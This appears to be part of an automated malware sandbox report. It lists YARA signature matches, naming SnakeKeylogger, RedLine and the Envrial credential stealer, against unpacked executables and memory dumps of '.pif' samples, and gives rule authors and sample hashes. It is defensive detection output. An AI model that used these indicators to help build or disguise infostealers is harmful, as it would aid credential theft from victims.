Source: 3.2.nhpoymuP.pif.30655570.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.nhpoymuP.pif.2f34a8c6.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.nhpoymuP.pif.2f34a8c6.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.nhpoymuP.pif.2f34a8c6.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.nhpoymuP.pif.284d0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.nhpoymuP.pif.284d0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.nhpoymuP.pif.284d0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.nhpoymuP.pif.27840ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.nhpoymuP.pif.27840ee8.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.nhpoymuP.pif.27840ee8.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.3.nhpoymuP.pif.25817960.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.nhpoymuP.pif.28470ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.3.nhpoymuP.pif.25817960.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.nhpoymuP.pif.28470ee8.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.3.nhpoymuP.pif.25817960.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.nhpoymuP.pif.28470ee8.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.nhpoymuP.pif.306ae390.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.nhpoymuP.pif.306ae390.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.nhpoymuP.pif.306ae390.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.nhpoymuP.pif.30656458.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.nhpoymuP.pif.30656458.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.image.exe.21e933d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.nhpoymuP.pif.30656458.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.nhpoymuP.pif.27a00000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.nhpoymuP.pif.27a00000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.nhpoymuP.pif.27a00000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.Pumyophn.PIF.215835b8.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.nhpoymuP.pif.275099de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.nhpoymuP.pif.31c30000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.nhpoymuP.pif.323b0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.nhpoymuP.pif.31c30000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.nhpoymuP.pif.323b0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.nhpoymuP.pif.31c30000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.nhpoymuP.pif.30656458.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.nhpoymuP.pif.323b0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.nhpoymuP.pif.30656458.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.nhpoymuP.pif.275099de.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.nhpoymuP.pif.27840000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.nhpoymuP.pif.30656458.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.nhpoymuP.pif.275099de.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.nhpoymuP.pif.30655570.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.3.nhpoymuP.pif.240bcc58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.nhpoymuP.pif.27840000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.nhpoymuP.pif.30655570.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.3.nhpoymuP.pif.240bcc58.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.nhpoymuP.pif.27840000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.nhpoymuP.pif.2750a8c6.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.nhpoymuP.pif.30655570.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.3.nhpoymuP.pif.240bcc58.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000E.00000002.2973060913.0000000028470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000001.1828156271.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000E.00000002.2964743999.0000000025CE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.1987899821.0000000030655000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000003.1711936477.000000002D7CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000E.00000002.2973237198.00000000284D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000002.1983839212.000000002F309000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.2965986286.0000000027A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.1989299008.00000000323B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000002.2964315761.00000000274C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.2965124892.0000000027840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000002.2945818229.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
